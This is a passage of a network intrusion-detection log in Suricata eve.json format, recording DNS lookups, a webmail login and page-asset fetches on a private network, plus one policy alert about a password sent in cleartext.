{"timestamp":"2020-02-29T00:24:56.000214+0000","event_type":"stats","stats":{"uptime":15148,"capture":{"kernel_packets":140517,"kernel_drops":0},"decoder":{"pkts":140526,"bytes":96460879,"invalid":195,"ipv4":138945,"ipv6":10,"ethernet":140526,"raw":0,"null":0,"sll":0,"tcp":133391,"udp":5344,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087552},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2889,"ssn_memcap_drop":0,"pseudo":352,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2905,"synack":2896,"rst":1216,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1904,"ftp":0,"smtp":0,"tls":779,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2445,"failed_udp":116},"tx":{"http":4922,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2527}},"flow_mgr":{"closed_pruned":2871,"new_pruned":17,"est_pruned":2525,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":10899,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:24:56.288577+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52541,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:24:56.397551+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52541,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.397551+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52541,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.412364+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60959,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":52542,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:24:56.520432+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52542,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.520432+0000","flow_id":1196688204654401,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60959,"proto":"UDP","dns":{"type":"answer","id":52542,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"alert","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2012887,"rev":3,"signature":"ET POLICY Http Client Body contains pass= in cleartext","category":"Potential Corporate Privacy Violation","severity":1},"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20}} {"timestamp":"2020-02-29T00:24:56.531252+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/login.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"POST","protocol":"HTTP\/1.1","status":302,"redirect":"\/services\/portal\/","length":20},"app_proto":"http","fileinfo":{"filename":"\/login.php","state":"CLOSED","stored":false,"size":113,"tx_id":0}} {"timestamp":"2020-02-29T00:24:56.554604+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50033,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19211,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:24:56.663729+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19211,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.663729+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19211,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:56.845414+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50033,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":19212,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:24:56.953878+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19212,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:24:56.953878+0000","flow_id":1553767490680428,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50033,"proto":"UDP","dns":{"type":"answer","id":19212,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:24:57.000273+0000","flow_id":1727159595722396,"event_type":"flow","src_ip":"192.168.10.122","src_port":51027,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:19:56.485020+0000","end":"2020-02-29T00:19:56.595891+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:24:57.177311+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8192}} {"timestamp":"2020-02-29T00:24:57.177971+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8192},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47189,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.181252+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196}} {"timestamp":"2020-02-29T00:24:57.182655+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201}} {"timestamp":"2020-02-29T00:24:57.183236+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:24:57.184142+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} {"timestamp":"2020-02-29T00:24:57.185061+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53120,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140}} {"timestamp":"2020-02-29T00:24:57.188596+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/turba\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":147,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.188909+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569}} {"timestamp":"2020-02-29T00:24:57.190628+0000","flow_id":1124614358556355,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53130,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297}} {"timestamp":"2020-02-29T00:24:57.191480+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":315,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189049+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":488,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189253+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":199,"tx_id":0}} {"timestamp":"2020-02-29T00:24:57.189640+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306}} {"timestamp":"2020-02-29T00:24:57.189715+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110}} {"timestamp":"2020-02-29T00:24:57.191693+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110},"app_proto":"http","fileinfo":{"filename":"\/js\/popup.js","state":"CLOSED","stored":false,"size":2903,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.193072+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538}} {"timestamp":"2020-02-29T00:24:57.193016+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947}} {"timestamp":"2020-02-29T00:24:57.197940+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569},"app_proto":"http","fileinfo":{"filename":"\/turba\/js\/minisearch.js","state":"CLOSED","stored":false,"size":1408,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.198362+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947},"app_proto":"http","fileinfo":{"filename":"\/js\/tooltips.js","state":"CLOSED","stored":false,"size":2555,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.194052+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53124,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/js\/hordeblocks.js","state":"CLOSED","stored":false,"size":528,"tx_id":1}} {"timestamp":"2020-02-29T00:24:57.194394+0000","flow_id":327567212657976,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53124,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180}} {"timestamp":"2020-02-29T00:24:57.199683+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53126,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538},"app_proto":"http","fileinfo":{"filename":"\/js\/growler.js","state":"CLOSED","stored":false,"size":8911,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.202349+0000","flow_id":105264000271271,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53120,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":222,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.235669+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641}} {"timestamp":"2020-02-29T00:24:57.236618+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/date.js","state":"CLOSED","stored":false,"size":85570,"tx_id":2}} {"timestamp":"2020-02-29T00:24:57.237983+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:24:57.238364+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53128,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/head-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":3}} {"timestamp":"2020-02-29T00:24:57.238682+0000","flow_id":291270444040479,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337}} {"timestamp":"2020-02-29T00:24:57.239649+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53122,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721}} {"timestamp":"2020-02-29T00:24:57.241182+0000","flow_id":1255271558660282,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53126,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974}} {"timestamp":"2020-02-29T00:24:57.241917+0000","flow_id":574029615970907,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53122,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 